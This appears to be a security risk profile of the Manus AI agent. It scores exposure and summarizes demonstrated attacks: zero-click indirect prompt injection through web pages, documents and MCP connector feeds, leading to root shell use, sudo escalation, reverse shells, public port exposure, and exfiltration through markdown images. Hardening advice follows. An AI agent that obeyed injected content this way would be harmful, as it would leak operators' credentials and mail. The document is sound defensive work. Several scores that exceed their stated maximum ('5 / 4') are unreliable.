1 Key Risks

The most critical security risks an operator inherits when deploying this agent in its documented default configuration. Manus presents broad input and tool execution exposure with minimal vendor-implemented controls on the default configuration, placing the full hardening burden on the operator.

Key Input Risks

No input filtering stands between untrusted web content, search results, uploaded documents, and MCP connector feeds and the agent reasoning loop on the default configuration. Independent research demonstrated zero-click indirect prompt injection from these channels driving high-privilege tool invocation [1][2].

Key Execution Risks

The agent executes arbitrary code via root-level shell within per-task cloud VM sandboxes, and independent research demonstrated passwordless sudo escalation and reverse shell establishment within the sandbox environment [1]. The sandbox provides per-task process isolation but grants unrestricted operations including root access within each VM [7].

Key Action Risks

Shell commands, browser navigation, file operations, MCP connector writes, and deploy_expose_port all fire autonomously without per-action operator approval on the default configuration [2]. Restricting deploy_expose_port and reducing MCP connector OAuth scopes to read-only are the highest-return operator actions to constrain the default blast radius [8].

Key Output Risks

Manus emits rich output including markdown with embedded images, browser-rendered content, and integration writes through connected services with no documented DLP or exfiltration blocking. Independent research confirmed data exfiltration via markdown image rendering from untrusted domains and browser navigation to attacker-controlled URLs [2].

Key Monitoring Risks

Infrastructure-level monitoring is implied by compliance certifications, and the vendor offers E-Discovery API and SIEM integration for enterprise workflows [6][11]. Operators should enable the E-Discovery API and configure SIEM forwarding to gain visibility into per-action agent behavior, which is not monitored by default.

2 AIRQ Scores

The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Manus, now operating at enterprise scale under Meta [10], carries a low composite score reflecting high capability with high exposure and minimal default defenses.

AIRQ Metrics

AIRQ Score4.88

Blast Radius8.5

Attack Surface7.36

Defense Controls2

Manus lands in the Exposed Giants quadrant with Attack Surface at 7.36, Blast Radius at 8.50, and Defense Controls at 2.

The table below summarizes Attack Surface out of 10, Blast Radius out of 10, Defense Controls out of 15, and the composite AIRQ score.

Metric	Score	Comments
AIRQ Score	4.88	Low composite reflects high exposure with minimal default defenses; input filtering is the highest-return operator action.
Blast Radius	8.5 / 10	Root shell, unrestricted networking, and OAuth-scoped credential access across multiple connected services dominate the blast profile.
Attack Surface	7.36 / 10	Four surfaces at adjusted ceiling driven by zero-click prompt injection and tool execution exploits with all three trifecta conditions met.
Defense Controls	2 / 15	Sandbox isolation and infrastructure monitoring are the only vendor-implemented controls on the default configuration.

3 Attack Surface

Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. The agent reasoning loop ingests untrusted content from web browsing, search results, uploaded documents, and OAuth-connected services as first-class input.

Attack Surface Metrics

User Input5

Tool Execution5

External Data5

Orchestration3

Memory1

Inter-Agent3

Reasoning3

Output Processing5

Planning3

Configuration2

Higher scores indicate surfaces where independent research has demonstrated exploitation or where the vendor documents broad unrestricted access by default.

Each row maps one attack surface to a score out of five and a brief comment citing the evidence anchor for the assessment.

Surface	Score	Comments
User Input	5 / 4	Accepts input from web, desktop, mobile, messaging, email, API, and MCP channels with no documented input validation; zero-click injection demonstrated [1][2].
External Data	5 / 4	Ingests untrusted content from web pages, search results, documents, and MCP connector feeds with no content validation gate [1][8].
Memory	1 / 4	Per-task sandbox provides session-level context only with no cross-session persistence or memory poisoning surface [7].
Reasoning	3 / 4	Multi-agent architecture with Planner, Execution, and Verification agents provides partial reasoning transparency [5][7].
Planning	3 / 4	Autonomous task decomposition with subagent delegation, background scheduling, and email-triggered automation [7].
Tool Execution	5 / 4	Root-level shell, browser, code execution, and deploy_expose_port with no per-action approval; passwordless sudo escalation demonstrated [1][2].
Orchestration	3 / 4	Multi-service orchestration via MCP connectors for Gmail, Notion, Stripe, Slack, and custom user-defined servers [8].
Inter-Agent	3 / 4	Connects to external MCP server ecosystems including custom user-defined servers with OAuth but no inter-agent message integrity; connector-level authorization alone does not prevent cross-boundary abuse [3][8].
Output Processing	5 / 4	Rich output with markdown image rendering and browser navigation with no DLP or exfiltration blocking; markdown image exfiltration demonstrated [2][9].
Configuration	2 / 4	MCP connectors from vendor-managed registry with OAuth authorization; custom MCP servers require explicit user setup; undisclosed telemetry modules found embedded in generated code [4][8].

The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. Manus ingests untrusted web content and connector data (untrusted_input), reads private mailbox and file-storage records via OAuth (sensitive_data), and transmits bytes outbound through unrestricted networking and markdown rendering (external_egress).

Lethal Trifecta · Complete (3 of 3)

Manus exhibits all three of these conditions in its documented default configuration:

Untrusted input — Browsed URLs, search engine results, fetched documents, and OAuth-connected service data all carry untrusted bytes into the agent reasoning loop [1][7].
Sensitive data — OAuth-scoped MCP connectors read Gmail messages, Google Drive files, Notion pages, Stripe records, and GitHub repositories on behalf of the operator [8].
External egress — Unrestricted outbound HTTP, deploy_expose_port, browser navigation, Gmail sending, Slack messaging, and markdown image fetching all transmit bytes outside the trust boundary [2][7].

4 Blast Radius

The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. A compromised Manus sandbox reaches root-level code execution, unrestricted outbound networking, OAuth-scoped credentials, and public internet exposure via deploy_expose_port.

Blast Radius Metrics

Code execution4

Credential access3

File system access3

Autonomous action3

Network access4

Deployment access3

Higher blast scores indicate factors where the agent holds broad default authority or where independent research demonstrated active exploitation.

Each row ties one blast factor to its score out of four and the agent-specific evidence anchoring the assessment.

Factor	Score	Comments
Code execution	4 / 4	Root-level shell with passwordless sudo demonstrated within per-task cloud VM sandbox, enabling system-level command execution [1][7].
File system access	3 / 4	Full read-write file system access within sandbox VM including system directories via root, in an ephemeral per-task environment [7].
Network access	4 / 4	Unrestricted outbound networking from sandbox with no documented SSRF protection, plus deploy_expose_port for public internet exposure [2][7].
Credential access	3 / 4	OAuth token access to Gmail, Google Drive, Stripe, HubSpot, GitHub, and other connected services via MCP connectors [8].
Autonomous action	3 / 4	Autonomous operation with background tasks, scheduled tasks via Mail Manus, and no per-action approval within running tasks [7].
Deployment access	3 / 4	deploy_expose_port directly exposes sandbox ports to the public internet, demonstrated in an independent prompt injection kill chain [2][7].

5 Defense Controls

Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. The vendor publishes sandbox isolation and compliance certifications but leaves input filtering, action approval, and output sanitization as operator-managed on the default configuration.

Defense Controls Metrics

Input Guardrails0

Execution Isolation1

Action Controls0

Output Guardrails0

Monitoring1

Higher scores indicate stronger vendor-implemented safeguards; most components score zero, reflecting an operator-managed defense posture.

Each component is scored on vendor-implemented defaults from zero (nothing in place) to three (independently verified multi-layer control).

Component	Score	Comments
Input Guardrails	0 / 3	No documented prompt shield, content filter, or injection detection on the default configuration; zero-click injection demonstrated [1][6].
Execution Isolation	1 / 3	Per-task cloud VM sandbox provides process isolation between tasks but grants root access and unrestricted networking within each sandbox [7].
Action Controls	0 / 3	No per-action approval gates for tool execution within tasks; deploy_expose_port and shell commands fire autonomously [2].
Output Guardrails	0 / 3	No documented DLP, credential redaction, or exfiltration channel blocking; markdown image exfiltration confirmed by independent research [2].
Monitoring	1 / 3	Infrastructure monitoring implied by SOC 2 Type 2 and ISO 27001; operators should enable the E-Discovery API and SIEM integration available for enterprise to gain per-action visibility [6][11].

6 Hardening Tips

Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators should prioritize three actions in order: (1) input filtering to break the trifecta chain, (2) per-action approval gates for shell and deploy commands, (3) output sanitization to constrain blast radius.

Input Guardrails

Input guardrails intercept adversarial content before it reaches the reasoning loop.

Input Guardrails

Policy Require all external content ingested via MCP connectors and web browsing to pass through an approved prompt injection classifier before reaching the agent.
Configuration Restrict the Mail Manus approved senders list to the minimum set of known internal addresses and disable email-triggered automation for sensitive workflows.
Engineering Deploy a purpose-built prompt shield service with instruction hierarchy separation between the untrusted data pipeline and the Manus reasoning loop.

Execution Isolation

Execution isolation contains what a compromised agent can do on the host.

Execution Isolation

Policy Mandate that all Manus tasks involving sensitive data run in sandboxes with non-root user accounts and restricted sudo access.
Configuration Configure sandbox firewall rules to block outbound connections to non-allowlisted domains, constraining the unrestricted default networking.
Engineering Implement microVM isolation (e.g., Firecracker) with capability dropping and seccomp profiles for the sandbox agent process; verify by attempting a container escape from a task.

Action Controls

Action controls govern which tools and actions the agent can invoke autonomously.

Action Controls

Policy Require operator approval for high-impact tool invocations including deploy_expose_port, MCP connector write operations, and outbound messaging.
Configuration Configure MCP connector integrations to use read-only OAuth scopes by default, requiring explicit elevation for write or send operations.
Engineering Build a policy enforcement proxy between the agent and tool execution endpoints evaluating each call against a deny-by-default allowlist.

Output Guardrails

Output guardrails inspect what the agent sends to other systems and users.

Output Guardrails

Policy Block markdown image rendering from untrusted domains and disable automatic URL fetching in agent output to close demonstrated exfiltration channels.
Configuration Configure output sanitization to strip embedded URLs, redirect chains, and active content from agent-generated markdown before delivery.
Engineering Deploy a DLP gateway between the agent output pipeline and downstream consumers inspecting outbound content for credential patterns and PII.

Monitoring

Monitoring captures what the agent did and surfaces anomalies for review.

Monitoring

Policy Forward all Manus task logs to the organization SIEM and establish alerting on anomalous tool invocation patterns for deploy_expose_port and MCP writes.
Configuration Enable the Manus E-Discovery API for compliance workflows and configure retention policies covering all task inputs, outputs, and tool records.
Engineering Instrument the sandbox environment with behavioral anomaly detection flagging unexpected shell sequences, network patterns, and privilege escalation attempts.

7 References

The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.

Selected Vulnerabilities

SilentBridge zero-click agent takeover Aurascape AuraLabs — three zero-click indirect prompt injection variants against Meta Manus, each CVSS 9.8, root sandbox compromise and Gmail exfiltration
Prompt injection exposes Manus VS Code Server Johann Rehberger — end-to-end indirect prompt injection kill chain invoking deploy_expose_port without approval and exfiltrating credentials via markdown images

Selected Research

SilentBridge connector authorization analysis DeepInspect — control and data plane separation failure and cross-tenant IDOR on CDN and insufficiency of connector-level OAuth
Manus AI hidden telemetry investigation Independent investigation — undisclosed analytics injection and network interception modules embedded in Manus-generated code
Manus AI technical architecture analysis ArXiv — multi-agent architecture analysis covering Planner and Execution and Verification agent design and sandbox environment

Vendor Documentation

Manus security and compliance page Vendor — SOC 2 Type 1 and 2 and ISO 27001:2022 and ISO 27701:2019 certifications and infrastructure and product security features
Manus Sandbox architecture Vendor — per-task isolated cloud VM sandbox with Zero Trust principle and root access by design and unrestricted operations
Manus MCP Connectors Vendor — prebuilt MCP integrations for Gmail and Notion and Stripe and HubSpot and Slack and Google Calendar and GitHub with OAuth 2.0
Manus Cloud Browser Vendor — isolated cloud browser instances with encrypted sessions and Take Over mechanism for authentication challenges

Other Sources

Meta acquires Manus AI agent firm CNBC — Meta acquisition of Manus and integration plans and platform scale of 147 trillion tokens processed
Manus Compliance APIs Vendor — E-Discovery API and SIEM integration capabilities for regulated enterprise compliance workflows